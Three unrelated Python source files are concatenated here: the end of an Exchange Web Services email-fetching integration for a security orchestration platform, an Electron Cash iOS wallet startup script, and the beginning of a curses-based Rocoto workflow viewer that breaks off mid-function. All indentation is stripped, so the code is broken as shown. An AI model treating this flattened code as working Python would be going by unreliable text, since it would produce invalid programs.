# Trying to decode using the detected encoding
data = attached_email_bytes.decode(encoding)
except UnicodeDecodeError:
# In case the detected encoding fails apply the default encoding
demisto.info(f'Could not decode attached email using detected encoding:{encoding}, retrying '
f'using utf-8.\nAttached email:\n{attached_email}')
data = attached_email_bytes.decode('utf-8')
file_result = fileResult(
get_attachment_name(attachment.name) + ".eml",
data,
)
if file_result:
# check for error
if file_result["Type"] == entryTypes["error"]:
demisto.error(file_result["Contents"])
raise Exception(file_result["Contents"])
# save attachment to incident
incident["attachment"].append(
{
"path": file_result["FileID"],
"name": get_attachment_name(attachment.name) + ".eml",
}
)
labels.append(
{
"type": label_attachment_type,
"value": get_attachment_name(attachment.name),
}
)
labels.append(
{"type": label_attachment_id_type, "value": attachment.attachment_id.id}
)
# handle headers
if item.headers:
headers = []
for header in item.headers:
labels.append(
{
"type": "Email/Header/{}".format(header.name),
"value": str(header.value),
}
)
headers.append("{}: {}".format(header.name, header.value))
labels.append({"type": "Email/headers", "value": "\r\n".join(headers)})
# handle item id
if item.message_id:
labels.append({"type": "Email/MessageId", "value": str(item.message_id)})
if item.id:
labels.append({"type": "Email/ID", "value": item.id})
labels.append({"type": "Email/itemId", "value": item.id})
# handle conversion id
if item.conversation_id:
labels.append({"type": "Email/ConversionID", "value": item.conversation_id.id})
incident["labels"] = labels
incident["rawJSON"] = json.dumps(parse_item_as_dict(item, None), ensure_ascii=False)
return incident
def fetch_emails_as_incidents(client: EWSClient, last_run):
"""
Fetch incidents
:param client: EWS Client
:param last_run: last run dict
:return:
"""
last_run = get_last_run(client, last_run)
try:
last_emails = fetch_last_emails(
client,
client.folder_name,
last_run.get(LAST_RUN_TIME),
last_run.get(LAST_RUN_IDS),
)
ids = deque(
last_run.get(LAST_RUN_IDS, []), maxlen=client.last_run_ids_queue_size
)
incidents = []
incident: Dict[str, str] = {}
for item in last_emails:
if item.message_id:
ids.append(item.message_id)
incident = parse_incident_from_item(item)
incidents.append(incident)
if len(incidents) >= client.max_fetch:
break
last_run_time = incident.get("occurred", last_run.get(LAST_RUN_TIME))
if isinstance(last_run_time, EWSDateTime):
last_run_time = last_run_time.ewsformat()
new_last_run = {
LAST_RUN_TIME: last_run_time,
LAST_RUN_FOLDER: client.folder_name,
LAST_RUN_IDS: list(ids),
ERROR_COUNTER: 0,
}
demisto.setLastRun(new_last_run)
return incidents
except RateLimitError:
if LAST_RUN_TIME in last_run:
last_run[LAST_RUN_TIME] = last_run[LAST_RUN_TIME].ewsformat()
if ERROR_COUNTER not in last_run:
last_run[ERROR_COUNTER] = 0
last_run[ERROR_COUNTER] += 1
demisto.setLastRun(last_run)
if last_run[ERROR_COUNTER] > 2:
raise
return []
def fetch_last_emails(
client: EWSClient, folder_name="Inbox", since_datetime=None, exclude_ids=None
):
"""
Fetches last emails
:param client: EWS client
:param (Optional) folder_name: folder name to pull from
:param (Optional) since_datetime: items will be searched after this datetime
:param (Optional) exclude_ids: exclude ids from fetch
:return: list of exchangelib.Items
"""
qs = client.get_folder_by_path(folder_name, is_public=client.is_public_folder)
if since_datetime:
qs = qs.filter(datetime_received__gte=since_datetime)
else:
tz = EWSTimeZone.timezone('UTC')
first_fetch_datetime = dateparser.parse(FETCH_TIME)
first_fetch_ews_datetime = EWSDateTime.from_datetime(tz.localize(first_fetch_datetime))
qs = qs.filter(last_modified_time__gte=first_fetch_ews_datetime)
qs = qs.filter().only(*[x.name for x in Message.FIELDS])
qs = qs.filter().order_by("datetime_received")
result = []
for item in qs:
if isinstance(item, Message):
result.append(item)
if len(result) >= client.max_fetch:
break
if exclude_ids and len(exclude_ids) > 0:
exclude_ids = set(exclude_ids)
result = [x for x in result if x.message_id not in exclude_ids]
return result
def test_module(client: EWSClient, max_fetch):
"""
test-module
* Max incidents per fetch <= MAX_INCIDENTS_PER_FETCH
* Account can be retrieved
* Account has read rights
* Test access to fetch folder
:param client: EWS Client
:param max_fetch: Max fetches per incident
:return: "ok"
"""
try:
if int(max_fetch) > MAX_INCIDENTS_PER_FETCH:
return_error(f'Error - Max incidents per fetch cannot be greater than {MAX_INCIDENTS_PER_FETCH}. '
f'You provided: {max_fetch}')
account = client.get_account()
if not account.root.effective_rights.read: # pylint: disable=E1101
raise Exception(
"Success to authenticate, but user has no permissions to read from the mailbox. "
"Need to delegate the user permissions to the mailbox - "
"please read integration documentation and follow the instructions"
)
client.get_folder_by_path(
client.folder_name, account, client.is_public_folder
).test_access()
except ErrorFolderNotFound as e:
if "Top of Information Store" in str(e):
raise Exception(
"Success to authenticate, but user probably has no permissions to read from the specific folder."
"Check user permissions. You can try !ews-find-folders command to "
"get all the folders structure that the user has permissions to"
)
return "ok"
def sub_main():
is_test_module = False
params = demisto.params()
args = prepare_args(demisto.args())
# client's default_target_mailbox is the authorization source for the instance
params['default_target_mailbox'] = args.get('target_mailbox',
args.get('source_mailbox', params['default_target_mailbox']))
client = EWSClient(**params)
start_logging()
try:
command = demisto.command()
# commands that return a single note result
normal_commands = {
"ews-get-searchable-mailboxes": get_searchable_mailboxes,
"ews-move-item-between-mailboxes": move_item_between_mailboxes,
"ews-move-item": move_item,
"ews-delete-items": delete_items,
"ews-search-mailbox": search_items_in_mailbox,
"ews-get-contacts": get_contacts,
"ews-get-out-of-office": get_out_of_office_state,
"ews-recover-messages": recover_soft_delete_item,
"ews-create-folder": create_folder,
"ews-mark-item-as-junk": mark_item_as_junk,
"ews-find-folders": find_folders,
"ews-get-items-from-folder": get_items_from_folder,
"ews-get-items": get_items,
"ews-get-folder": get_folder,
"ews-expand-group": get_expanded_group,
"ews-mark-items-as-read": mark_item_as_read,
"send-mail": send_email,
}
# commands that may return multiple results or non-note result
special_output_commands = {
"ews-get-attachment": fetch_attachments_for_message,
"ews-delete-attachment": delete_attachments_for_message,
"ews-get-items-as-eml": get_item_as_eml,
}
# system commands:
if command == "test-module":
is_test_module = True
demisto.results(test_module(client, params.get('max_fetch')))
elif command == "fetch-incidents":
last_run = demisto.getLastRun()
incidents = fetch_emails_as_incidents(client, last_run)
demisto.incidents(incidents)
# special outputs commands
elif command in special_output_commands:
demisto.results(special_output_commands[command](client, **args)) # type: ignore[operator]
# normal commands
else:
output = normal_commands[command](client, **args) # type: ignore[operator]
return_outputs(*output)
except Exception as e:
start_logging()
debug_log = log_stream.getvalue() # type: ignore[union-attr]
error_message_simple = ""
# Office365 regular maintenance case
if isinstance(e, ErrorMailboxStoreUnavailable) or isinstance(
e, ErrorMailboxMoveInProgress
):
log_message = (
"Office365 is undergoing load balancing operations. "
"As a result, the service is temporarily unavailable."
)
if demisto.command() == "fetch-incidents":
demisto.info(log_message)
demisto.incidents([])
sys.exit(0)
if is_test_module:
demisto.results(
log_message + " Please retry the instance configuration test."
)
sys.exit(0)
error_message_simple = log_message + " Please retry your request."
if isinstance(e, ConnectionError):
error_message_simple = (
"Could not connect to the server.\n"
f"Additional information: {str(e)}"
)
else:
if is_test_module and isinstance(e, MalformedResponseError):
error_message_simple = (
"Got invalid response from the server.\n"
)
# Legacy error handling
if "Status code: 401" in debug_log:
error_message_simple = (
"Got unauthorized from the server. "
)
if "Status code: 503" in debug_log:
error_message_simple = (
"Got timeout from the server. "
"Probably the server is not reachable with the current settings. "
)
if not error_message_simple:
error_message = error_message_simple = str(e)
else:
error_message = error_message_simple + "\n" + str(e)
stacktrace = traceback.format_exc()
if stacktrace:
error_message += "\nFull stacktrace:\n" + stacktrace
if debug_log:
error_message += "\nFull debug log:\n" + debug_log
if demisto.command() == "fetch-incidents":
raise
if demisto.command() == "ews-search-mailbox" and isinstance(e, ValueError):
return_error(
message="Selected invalid field, please specify valid field name.",
error=e,
)
if is_test_module:
demisto.results(error_message_simple)
else:
demisto.results(
{
"Type": entryTypes["error"],
"ContentsFormat": formats["text"],
"Contents": error_message_simple,
}
)
demisto.error(f"{e.__class__.__name__}: {error_message}")
finally:
exchangelib_cleanup()
if log_stream:
try:
logging.getLogger().removeHandler(log_handler) # type: ignore
log_stream.close()
except Exception as ex:
demisto.error(
"EWS: unexpected exception when trying to remove log handler: {}".format(
ex
)
)
def process_main():
"""setup stdin to fd=0 so we can read from the server"""
sys.stdin = os.fdopen(0, "r")
sub_main()
def main():
# When running big queries, like 'ews-search-mailbox' the memory might not freed by the garbage
# collector. `separate_process` flag will run the integration on a separate process that will prevent
# memory leakage.
separate_process = demisto.params().get("separate_process", False)
demisto.debug("Running as separate_process: {}".format(separate_process))
if separate_process:
try:
p = Process(target=process_main)
p.start()
p.join()
except Exception as ex:
demisto.error("Failed starting Process: {}".format(ex))
else:
sub_main()
from MicrosoftApiModule import * # noqa: E402
if __name__ in ("__main__", "__builtin__", "builtins"):
main()
|
app.py
|
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from electroncash_gui.ios_native.monkeypatches import MonkeyPatches
from electroncash.util import set_verbosity
from electroncash_gui.ios_native import ElectrumGui
from electroncash_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from electroncash.simple_config import SimpleConfig
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
'whitelist_servers_only' : True, # on iOS we force only the whitelist ('preferred') servers only for now as a security measure
}
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Vitae FTW!"
def _printStats(config_options):
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from electroncash import version
NSLog("ViLight lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
rocoto_viewer.py
|
#!/usr/bin/env python
#
##@namespace rocoto_viewer
# @brief A Curses based terminal viewer to interact and display the status of a Rocoto Workflow in real time.
#
# @anchor rocoto_viewer
## This Python script allows users to see and interact with a running Rocoto Workflow in real time.
# \image html pythonCurses.jpeg "Rocoto Viewer for Displaying Real-time Status of Workflow"
#
# To launch this viewer simply give it the database and the XML files being used by the \b Rocoto system for your experiment:
#
# rocoto_viewer.py -w my_gfs-workflow.xml -d my_database.db
#
# The script is located in the directory para/exp/rocoto/rocotoviewers/rocotoviewer_curses/rocoto_viewer.py
# The view will continuously update every four minutes and reflect the current status of your workflow. You may use your mouse or arrow keys to select a particular task and view its status details by pressing the key \p c as indicated as \b \<c\> (which runs \b rocotocheck) or perform a \b rocotorewind by pressing \b \<r\> to restart the workflow at that point. Running \b rocotorewind causes the state information of that task to be cleared from the database and resubmits the job to the scheduler.
#
# Tasks marked with the \b \< symbol are \b metatasks and can be expanded by highlight that task with the mouse, and then clicking on the \b \< symbol which then changes to \b \> . You can then click on the \b \> symbol to collapse it again. Alternatively, you can select the 'x' to expand and collapse metatasks when selected.
#
##@cond ROCOTO_VIEWER_CURSES
from __future__ import division
import curses
import os, sys, getpass, getopt, signal, tempfile
from os.path import basename
import subprocess
from math import *
from __builtin__ import any as b_any
from os.path import realpath, normpath, dirname, getsize
from io import StringIO
from itertools import groupby
from time import time
from multiprocessing import Process, Queue
import time as std_time
from datetime import datetime, timedelta
import uuid
import shutil
import sqlite3,datetime,collections
import xml.etree.ElementTree as ET
import cPickle
try:
from dateutil.relativedelta import relativedelta
except ImportError:
#print 'dateutil which uses relativedelta to increment monthly (used by UGCS) is not supported with this version of python. Use Anaconda the native version in /user/bin'
#sys.exit(1)
pass
# Global Variables
database_file_agmented = None
use_performance_metrics = False
default_column_length = 125
stat_read_time_delay = 3*60
temp_workflow_file = ''
header_string = ''
format_string = "jobid slots submit_time start_time cpu_used run_time delimiter=';'"
ccs_html='''
<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="180">
<style type="text/css">
thead { font-weight:bold; }
red { background-color:red }
blue { background-color:lightblue }
green { background-color:lightgreen }
yellow { background-color:yellow }
td, th {
border: 2px solid #999;
padding: 0.5rem;
}
table {
border-collapse: collapse;
}
</style>
</head>
'''
bottom_message_scroll = '<c>heck <b>oot <r>ewind <R>un (->) Next Cycle (<-) Previous Cycle <u>p <d>own <h>elp <Q>uit'
bottom_message = '<c>heck <b>oot <r>ewind <R>un (->) Next Cycle (<-) Previous Cycle <h>elp <Q>uit'
#Global Variables
#================
list_tasks = False
html_output = False
html_output_file = None
rzdm_path = ''
only_check_point = False
save_checkfile_path = None
use_multiprocessing = True
get_user = getpass.getuser()
screen_resized = False
debug = None
mlines = 0
mcols = 0
def sigwinch_handler(signum, frame):
global screen_resized
global mlines
global mcols
term_size = subprocess.Popen(['stty', 'size'], stdout=subprocess.PIPE)
try:
get_term_size, err = term_size.communicate()
except:
return
mlines,mcols = map(int,get_term_size.split())
screen_resized = True
def usage(message=None):
curses.endwin()
print>>sys.stderr, '''
Usage: rocoto_status_viewer.py -w workflow.xml -d database.db [--listtasks]\n [--html=filename.html]\n [--perfmetrics={True,False}]
Mandatory arguments:
-w workflow.xml
-d database.db
Optional arguments:
--listtasks --- print out a list of all tasks
--html=filename.html --- creates an HTML document of status
--perfmetrics=True --- turn on/off extra columns for performance metrics
--help --- print this usage message'''
if message is not None:
print>>sys.stderr,'\n'+str(message).rstrip()+'\n'
sys.exit(-1)
def augment_SQLite3(filename):
connection=sqlite3.connect(filename)
c=connection.cursor()
#qinfo=c.execute("DROP TABLE IF EXISTS jobs_augment;")
qinfo=c.execute("PRAGMA table_info(jobs_augment)").fetchall()
if any('qtime' in element for element in qinfo):
c.close()
return 'is_already_augmented'
else:
sql_create_augment_table = "CREATE TABLE jobs_augment AS SELECT * FROM jobs;"
q=c.execute(sql_create_augment_table)
q=c.execute("alter table jobs_augment add column qtime integer;")
q=c.execute("alter table jobs_augment add column cputime integer;")
q=c.execute("alter table jobs_augment add column runtime integer;")
q=c.execute("alter table jobs_augment add column slots integer;")
connection.commit()
c.close()
database_file = filename
return 'now_augmented'
def isSQLite3(filename):
from produtil.fileop import check_file
from produtil.fileop import deliver_file
if not check_file(filename):
return False
if getsize(filename) < 100:
return False
with open(filename, 'rb') as fd:
header = fd.read(100)
fd.close()
if not header[:16] == 'SQLite format 3\x00':
return False
else:
return True
def isRocotoWorkflow(filename):
from produtil.fileop import check_file
if not check_file(filename):
return False
with open(filename, 'r') as input:
for line in input:
if 'DOCTYPE workflow' in line:
input.close()
return True
return False
def load_produtil_pythonpath():
try:
import produtil.cluster
return True
except ImportError:
pass
PRODUTIL = collections.defaultdict(list)
PRODUTIL['theia'] = '/scratch4/NCEPDEV/global/save/glopara/svn/nceplibs/produtil/trunk/ush'
PRODUTIL['luna'] = '/gpfs/hps3/emc/global/noscrub/emc.glopara/svn/nceplibs/produtil/trunk/ush'
PRODUTIL['tide'] = '/gpfs/td1/emc/global/save/emc.glopara/svn/nceplibs/produtil/trunk/ush'
PRODUTIL['gyre'] = '/gpfs/gd1/emc/global/save/emc.glopara/svn/nceplibs/produtil/trunk/ush'
try_clusters = ('theia','luna','tide','gyre')
for cluster in try_clusters:
sys.path.append(PRODUTIL[cluster])
try:
import produtil.cluster
return True
except ImportError:
pass
return False
def get_arguments():
from produtil.fileop import check_file
short_opts = "w:d:f:"
long_opts = ["checkfile=","workfolw=","database=","html=","listtasks","onlycheckpoint","help","perfmetrics="]
try:
opts, args = getopt.getopt(sys.argv[1:], short_opts, long_opts)
except getopt.GetoptError as err:
print str(err)
print
usage('SCRIPT IS ABORTING DUE TO UNRECOGNIZED ARGUMENT')
global save_checkfile_path
global use_performance_metrics
workflow_file = None
database_file = None
perfmetrics_on = None
for k, v in opts:
if k in ('-w', '--workflow'):
workflow_file = v
elif k in ('-d','--database'):
database_file = v
elif k in ('-f','--checkfile'):
save_checkfile_path = v
elif k in ('--perfmetrics'):
perfmetrics_on = v
elif k in ('--listtasks'):
global list_tasks
list_tasks = True
elif k in ('--onlycheckpoint'):
global only_check_point
only_check_point = True
elif k in ('--html'):
global html_output
global rzdm_path
global send_html_to_rzdm
send_html_to_rzdm = True
rzdm_path = v
html_output = True
elif k in ('--help'):
usage('')
else:
pass
#usage('OPTION NOT REGOGNIZED')
if perfmetrics_on is None:
use_performance_metrics = False
elif perfmetrics_on.lower() == 'true':
use_performance_metrics = True
elif perfmetrics_on.lower() == 'false':
use_performance_metrics = False
elif perfmetrics_on is not None:
usage('perfmetrics must be either set to true or false (e.g. --perfmetrics=True')
send_html_to_rzdm = False
if len(rzdm_path) != 0:
if ':' not in rzdm_path or '@' not in rzdm_path:
print 'No user name or path found for sending html directory to server, no files will be sent to rzdm'
print 'Creating html folder in: %s'%rzdm_path
else:
send_html_to_rzdm = True
if list_tasks and workflow_file is None:
usage('In order to list tasks you must supply the XML worflow-file')
if only_check_point and (workflow_file is None or database_file is None or save_checkfile_path is None):
usage('To use the check point output you must specify the workflow, data base, and the specific name of the checkpoint file')
if (not list_tasks) and (workflow_file is None or database_file is None):
usage('Booth database-file and workflow-file must be specified')
if (not list_tasks) and (workflow_file is not None and database_file is not None):
#debug.write('database_file_agmented: '+database_file_agmented+'\n')
if not isSQLite3( database_file ):
usage('%s is not SQLite3 database file'%database_file)
if not isRocotoWorkflow( workflow_file ):
usage('%s is not an Rocoto XML file'%workflow_file)
#global use_multiprocessing
#if getsize(database_file) < 104857600:
# use_multiprocessing = True
#else:
# use_multiprocessing = True
return (workflow_file,database_file )
def get_entity_values( workflow_file ):
entity_values = collections.defaultdict(list)
with open( workflow_file, 'rw' ) as f:
for line in f:
split_line = line.split()
if ']>' in line:
break
if 'ENTITY' in line:
if 'SYSTEM' in line:
value = split_line[3]
else:
value = split_line[2]
entity_values[ split_line[1] ] = value[:-1].replace('"','')
return entity_values
def timedelta_total_seconds(timedelta):
return (
timedelta.microseconds + 0.0 +
(timedelta.seconds + timedelta.days * 24 * 3600) * 10 ** 6) / 10 ** 6
def get_aug_perf_values( username ):
from produtil.run import run,runstr, batchexe
global html_ouput
global format_keys
cmd = batchexe('which') ['bjobs']
try:
which_bjobs = runstr(cmd).strip()
except Exception,e:
return None
bjobs = collections.defaultdict(dict)
aug_perf = collections.defaultdict(dict)
cmd = batchexe( which_bjobs )['-a','-o',format_string,'-u',username]
bjobs_line = runstr(cmd)
if 'No job found' in bjobs_line:
return None
bjobs_lines = bjobs_line.split('\n')
for l,line in enumerate(bjobs_lines):
split_line = line.split(';')
if l == 0:
format_keys = split_line
continue
for i, value in enumerate(split_line):
if i == 0:
key = value
else:
if format_keys[i] in ('RUN_TIME','CPU_USED'):
value_list = value.split()
if len(value_list) > 1:
value = value_list[0]
bjobs[key][format_keys[i]] = value
sub_time_string = ''
year = str(datetime.datetime.now().year)+' '
sub_time = None
bstart_time = None
for jobid,keys in bjobs.iteritems():
#debug.write(jobid+'\n')
for key in keys:
#debug.write(' '+key+":"+bjobs[jobid][key]+'\n')
try:
int_key = int(bjobs[jobid][key].strip())
str_key = str(int_key)
except:
str_key = bjobs[jobid][key].strip()
if key == 'SUBMIT_TIME':
sub_time_string = str_key
try:
sub_time = datetime.datetime.strptime( year+sub_time_string, '%Y %b %d %H:%M' )
except:
sub_time = None
continue
elif key == 'START_TIME':
bstart_time_string = str_key
try:
bstart_time = datetime.datetime.strptime( year+bstart_time_string, '%Y %b %d %H:%M' )
except:
bstart_time = None
continue
elif key == 'RUN_TIME':
aug_perf[jobid]['runtime'] = str_key
elif key == 'CPU_USED':
aug_perf[jobid]['cputime'] = str_key
elif key == 'SLOTS':
aug_perf[jobid]['slots'] = str_key
if bstart_time_string == sub_time_string:
aug_perf[jobid]['qtime'] = '0'
elif sub_time is not None and bstart_time is None :
try:
aug_perf[jobid]['qtime'] = str(int(( datetime.datetime.now() - sub_time ).total_seconds()))
except AttributeError:
aug_perf[jobid]['qtime'] = str(int(timedelta_total_seconds( datetime.datetime.now() - sub_time )))
elif sub_time is not None and bstart_time is not None:
try:
aug_perf[jobid]['qtime'] = str(int((bstart_time - sub_time).total_seconds()))
except AttributeError:
aug_perf[jobid]['qtime'] = str(int(timedelta_total_seconds(bstart_time - sub_time)))
else:
aug_perf[jobid]['qtime'] = '-'
return aug_perf
def help_screen( screen ):
max_row = 25
box_cols = 60
box = curses.newwin( max_row, box_cols , 5, 32 )
box.box()
box.border(0)
box.addstr( 0 , 23, '<q> when done', curses.A_BOLD )
helpstr= [ '<c>heck : run rocotocheck on selected task(s)',
'<b>oot : run rocotoboot on selected task(s)',
'<r>ewind : run rocotorewind on selected task(s)',
'<R>un : run rocotorun on selected task(s)',
' ',
'(->) Next Cycle <d>own (or) Page-dwn to scroll',
'(<-) Previous Cycle <u>own (or) Page-up to scroll ',
' ',
'<Shift> + Arrow Up to selected multiple tasks',
'<Shift> + Arrow Down for using with rocoto utils',
'Double-Click or <x> to expand/collapse metatasks',
' ',
'<ENTER> Selects a task for list or opens meta-task list',
' ',
' When a meta-task list is open for selection:',
' Double-Click (or) <s> to select the begining',
' of a range for selection and repeate to complete',
' the desired selected list.',
'',
'<l>oads and renews status data (no rocotorun)',
'<F>inds the last cycle with a running task',
'<U>nloads and clears all previously seleted tasks',
'<f>makes a symlink of log file of highlited task']
for i in range(0,len(helpstr)):
box.addstr( 1+i ,2, helpstr[i] )
x = screen.getch()
while x != ord('q'):
x = screen.getch()
box.refresh()
def list_selector( screen, selected_strings, strings ):
global screen_resized
global mlines
global mcols
global highlightText
global highlightSelectedText
global normalText
def define_box():
if len( strings ) < mlines:
max_row = len( strings )
else:
max_row = mlines - 12
max_mcols = max(18,len(max( strings, key=len )))
if max_mcols + 8 < mcols:
box_cols = max_mcols + 8
else:
box_cols = mcols - 3
box = curses.newwin( max_row + 6, box_cols , 4, 5 )
box.box()
box.border(0)
return box, max_row, box_cols
strings_selected = selected_strings
string_ctr_selected = ''
box, max_row, box_cols = define_box()
row_num = len( strings )
pages = int( ceil( row_num / max_row ) )
position = 1
page = 1
for i in range( 1, max_row+1 ):
if row_num == 0:
box.addstr( 1, 1, "There aren't strings", highlightText )
else:
print_string = ' '+strings[ i - 1 ]+' '
if (i == position):
box.addstr( i+1, 2, print_string, highlightText )
else:
box.addstr( i+1, 2, print_string, normalText )
if i == row_num:
break
screen_resized = False
range_selected = False
string_ctr_selected_prior = ''
x = screen.getch()
while x != ord('q'):
if screen_resized:
screen_resized = False
curses.resizeterm(mlines, mcols)
screen.refresh()
box.clear()
box.erase()
box, max_row, box_cols = define_box()
box.border( 0 )
box.refresh()
if x in ( curses.KEY_SF, curses.KEY_DOWN):
if x == curses.KEY_SF:
string_selected = strings[ position - 1 ]
if string_selected in strings_selected:
string_ctr_selected = ''
try:
if len(strings_selected) > 0:
strings_selected.remove( string_selected )
except ValueError:
pass
else:
strings_selected.append( string_selected )
if page == 1:
if position < i:
position = position + 1
else:
if pages > 1:
page = page + 1
position = 1 + ( max_row * ( page - 1 ) )
elif page == pages:
if position < row_num:
position = position + 1
else:
if position < max_row + ( max_row * ( page - 1 ) ):
position = position + 1
else:
box.erase()
box.border(0)
page = page + 1
position = 1 + ( max_row * ( page - 1 ) )
if x in ( curses.KEY_SR, curses.KEY_UP):
if x == curses.KEY_SR:
string_selected = strings[ position - 1 ]
if string_selected in strings_selected:
try:
if len(strings_selected) > 0:
strings_selected.remove( string_selected )
except ValueError:
pass
else:
strings_selected.append( string_selected )
if page == 1:
if position > 1:
position = position - 1
else:
if position > ( 1 + ( max_row * ( page - 1 ) ) ):
position = position - 1
else:
box.erase()
box.border(0)
page = page - 1
position = max_row + ( max_row * ( page - 1 ) )
if x == curses.KEY_PPAGE:
box.erase()
box.border( 0 )
if page > 1:
page = page - 1
position = 1 + ( max_row * ( page - 1 ) )
if x == curses.KEY_NPAGE:
box.erase()
box.border( 0 )
#screen.refresh()
if page < pages:
page = page + 1
position = ( 1 + ( max_row * ( page - 1 ) ) )
if x in ( curses.KEY_MOUSE, ord('s') ):
mouse_id, mouse_x, mouse_y, mouse_z, button_state = (0,0,0,0,0)
index_prior_selected = 0
if x == curses.KEY_MOUSE:
mouse_id, mouse_x, mouse_y, mouse_z, button_state = curses.getmouse()
box.erase()
box.border( 0 )
pos = mouse_y-5
if page == 1:
position = pos
else:
position = max_row*(page-1)+pos
if x == ord('s') or (button_state & curses.BUTTON1_DOUBLE_CLICKED):
string_ctr_selected = strings[ position - 1 ]
if range_selected:
range_selected = False
string_ctr_selected = ''
if string_ctr_selected != string_ctr_selected_prior:
index_prior_selected = strings.index(string_ctr_selected_prior)
if position < index_prior_selected:
first = position-1
last = index_prior_selected+1
else:
first = index_prior_selected
last = position
for i in range( first, last ):
if strings[i] in strings_selected:
strings_selected.remove(strings[i])
else:
strings_selected.append( strings[i] )
string_ctr_selected_prior = ''
else:
range_selected = True
string_ctr_selected_prior = string_ctr_selected
if x in (curses.KEY_ENTER, 10, 13) and row_num != 0:
box.border( 0 )
string_selected = strings[ position - 1 ]
if string_ctr_selected_prior == string_selected:
string_ctr_selected_prior = ''
range_selected = False
if string_selected in strings_selected:
try:
if len(strings_selected) > 0:
strings_selected.remove( string_selected )
except ValueError:
pass
else:
strings_selected.append( string_selected )
if x == ord('U'):
for each_sting in strings:
if each_sting in strings_selected:
if len(strings_selected) > 0:
strings_selected.remove(each_sting)
for i in range( 1 + ( max_row * ( page - 1 ) ), max_row + 1 + ( max_row * ( page - 1 ) ) ):
if row_num == 0:
box.addstr( 1, 1, "There aren't strings", highlightText )
else:
if strings[ i - 1 ] == string_ctr_selected_prior:
string_print = '* '+strings[ i - 1 ]+' '
else:
string_print = ' '+strings[ i - 1 ]+' '
start_pos = i - ( max_row * ( page - 1 ) ) + 1
if ( i + ( max_row * ( page - 1 ) ) == position + ( max_row * ( page - 1 ) ) ):
box.addstr( start_pos, 2, string_print, highlightText )
else:
box.addstr( start_pos, 2, string_print, normalText )
if strings[ i - 1 ] in strings_selected:
box.addstr( start_pos, 2, string_print[:1] )
box.addstr( start_pos, 4, string_print[2:-1], highlightSelectedText | curses.A_DIM )
if i == row_num:
break
box.addstr( max_row+3 , 2, 'Select with <ENTER> or' )
box.addstr( max_row+4 , 2, '<SHIFT> + <UP/DOWN>' )
box.addstr( 0 , 7, '<q> when done', curses.A_BOLD )
box.refresh()
x = screen.getch()
return strings_selected
def get_rocoto_check(params, queue_check):
from produtil.run import run,runstr, batchexe, exe
workflow_file, database_file, task, cycle, process = params
cmd=batchexe('rocotocheck')['-v',10,'-w',workflow_file,'-d',database_file,'-c',cycle,'-t',task]
check=runstr(cmd)
if check is None:
curses.endwin()
print 'rcotocheck falied: %d'%stat
sys.exit(-1)
queue_check.put(check)
def rocoto_boot(params):
from produtil.run import run,runstr, batchexe, exe
workflow_file, database_file, cycle, metatask_list, task_list = params
run( exe('yes') | exe('head')['-1'] > '.yes.txt')
if len(task_list) == 0 and len(metatask_list) != 0:
cmd=batchexe('rocotoboot')['--workflow', workflow_file,'--database',database_file,'--cycles',cycle,'--metatasks', metatask_list] < '.yes.txt'
elif len(task_list) != 0 and len(metatask_list) == 0:
cmd=batchexe('rocotoboot')['--workflow', workflow_file,'--database',database_file,'--cycles',cycle,'--tasks', task_list ] < '.yes.txt'
elif len(task_list) != 0 and len(metatask_list) != 0:
cmd=batchexe('rocotoboot')['--workflow', workflow_file,'--database',database_file,'--cycles',cycle,'--tasks', task_list, '--metatasks', metatask_list ] < '.yes.txt'
else:
return 'Warning: No metatasks or tasks where selected when rocotboot was called'
stat=runstr(cmd)
if stat is None:
display_results( 'rcotoboot falied!!','')
return stat
def rocoto_rewind(params):
from produtil.run import run,runstr, batchexe
workflow_file, database_file, cycle, process = params
cmd=batchexe('rocotorewind')['-w',workflow_file,'-d',database_file,'-c',cycle,process]
stat=runstr(cmd)
if stat is None:
display_results('rcotorewind falied!!','')
return stat
def rocoto_run(params):
from produtil.run import run,runstr, batchexe
workflow_file, database_file = params
cmd=batchexe('rocotorun')['-w',workflow_file,'-d',database_file]
stat=runstr(cmd )
stat = ''
if stat is None:
curses.endwin()
print 'rcotorun falied: %d'%stat
sys.exit(-1)
return stat
def get_tasklist(workflow_file):
import produtil.run, produtil.numerics
tasks_ordered = []
metatask_list = collections.defaultdict(list)
tree = ET.parse(workflow_file)
root = tree.getroot()
cycledef_group_cycles = collections.defaultdict(list)
if list_tasks:
curses.endwin()
print
cycle_noname = 'default_cycle'
for child in root:
if child.tag == 'cycledef':
if len(child.attrib) != 0:
cycle_def_name = child.attrib['group']
else:
cycle_def_name = cycle_noname
cycle_string = child.text.split()
ucgs_is_cron = None
if PACKAGE.lower() == 'ugcs':
start_cycle = produtil.numerics.to_datetime ( entity_values['SDATE'] )
end_cycle = produtil.numerics.to_datetime ( entity_values['EDATE'] )
#inc_cycle = produtil.numerics.to_timedelta( entity_values['INC_MONTHS'] )
#NOTE: this is for the special case when cycle for every month
inc_cycle = int(entity_values['INC_MONTHS'])
if inc_cycle == 0:
inc_cycle = produtil.numerics.to_timedelta( cycle_string[2] )
ucgs_is_cron = False
else:
